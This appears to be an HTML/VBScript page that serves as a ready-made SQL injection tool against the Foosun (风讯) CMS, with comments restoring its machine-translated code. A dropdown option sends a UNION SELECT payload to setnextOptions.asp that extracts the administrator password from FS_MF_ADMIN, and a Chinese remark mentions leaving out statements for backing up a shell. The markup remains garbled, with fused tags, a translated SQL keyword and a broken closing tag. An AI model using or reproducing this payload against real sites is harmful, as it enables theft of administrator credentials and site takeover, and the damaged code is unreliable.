<script language="vbscript">
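' Size and position the browser window once the page has loaded.
' The extracted text had fused the keywords ("Subwindow_onload", "Endsub")
' and turned each argument pair into a dotted number ("450.380", "300.300");
' resizeTo takes (width, height) and moveTo takes (x, y), both in pixels.
Sub window_onload
    window.resizeTo 450, 380
    window.moveTo 300, 300
End Sub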
</script>
<script language="vbscript">
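' Fetch a URL, decode the response as GB2312 text, show it on the page and
' return it.
'
'   path - the full URL to request; the function passes it to GetBody
'          unchanged, so whatever the caller concatenates is requested as-is.
'
' Returns the decoded response text.
'
' The original listing declared the parameter as `path` but passed an
' undefined name (`jalur`, a machine-translation of "path") to GetBody, so
' the request was made with an empty variable. The parameter is used here.
Function GetHttpPage(path)
    Dim rawBytes
    rawBytes = GetBody(path)
    GetHttpPage = BytesToBstr(rawBytes, "gb2312")
    ' innerText (not innerHTML) is used, so the remote response is rendered
    ' as literal text and is not parsed as markup or script by this page.
    ' NOTE(review): no element with id "url" appears in the visible part of
    ' the page; if it is missing this line raises a runtime error - confirm.
    document.getElementById("url").innerText = GetHttpPage
End Function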
</script>
<script language="vbscript">
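' Issue a synchronous HTTP GET and return the raw response body.
'
'   url - the address to request; it is not validated or normalised here.
'
' Returns the value of the XMLHTTP object's responseBody property. Because
' of "On Error Resume Next", any failure (object creation, connection, HTTP
' error) is swallowed and the function then returns whatever has been
' assigned so far, which may be Empty; callers must cope with that.
'
' The extracted text had translated or fused the keywords ("Tanpa retrieval"
' for "With Retrieval", ".Mengirim" for ".Send", "tidak ada" for "Nothing",
' "Fungsi endfungsi" for "End Function"); they are restored here.
'
' Detection note: a page script that instantiates Microsoft.XMLHTTP and then
' feeds responseBody into ADODB.Stream is a pairing that endpoint and mail
' filtering rules commonly key on.
Function GetBody(url)
    On Error Resume Next
    Dim retrieval
    Set retrieval = CreateObject("microsoft.xmlhttp")
    With retrieval
        ' Third argument False = synchronous: the call blocks until the
        ' response arrives. The two empty strings are user name and password.
        .Open "get", url, False, "", ""
        .Send
        GetBody = .responseBody
    End With
    Set retrieval = Nothing
End Function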
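' Decode a byte array into a string using the named character set.
'
'   body - the raw bytes to decode (here, the responseBody from GetBody).
'   cset - the character set name handed to ADODB.Stream, e.g. "gb2312".
'
' Returns the decoded text, or "" when body is Empty or Null.
'
' The bytes are written to an ADODB.Stream in binary mode, the stream is
' rewound and switched to text mode with the requested charset, and the
' contents are read back as a string.
'
' GetBody suppresses its own errors and can hand back Empty after a failed
' request; the original then failed inside Stream.Write. The guard below
' returns an empty string instead. The function name and keywords, garbled
' in the extracted text ("FunctionByTestObstr", "tidak ada"), are restored.
Function BytesToBstr(body, cset)
    If IsEmpty(body) Or IsNull(body) Then
        BytesToBstr = ""
        Exit Function
    End If

    Dim objstream
    Set objstream = CreateObject("adodb.stream")
    objstream.Type = 1          ' adTypeBinary
    objstream.Mode = 3          ' adModeReadWrite
    objstream.Open
    objstream.Write body
    objstream.Position = 0      ' rewind before changing the stream type
    objstream.Type = 2          ' adTypeText
    objstream.Charset = cset
    BytesToBstr = objstream.ReadText
    objstream.Close
    Set objstream = Nothing
End Function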
</script>
<title> bylcx </title>
<inputId = "urlcode" name = "urlcode" size = "60" value = "http: // 风讯 url/user/setnextOptions.asp">
<selectid = "sql" name = "sql" onchange = vbs: getHttppage (document.geteLementById ("urlcode"). value+document.geteLementById ("sql"). value)>
<optionValue = ""> 风讯 SQL 版注入 , 至于其它备份 shell 的语句懒得写了 </pection>
<optionvalue="?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20 dari%20FS_MF_ADMIN%20-where%20id = 1-")")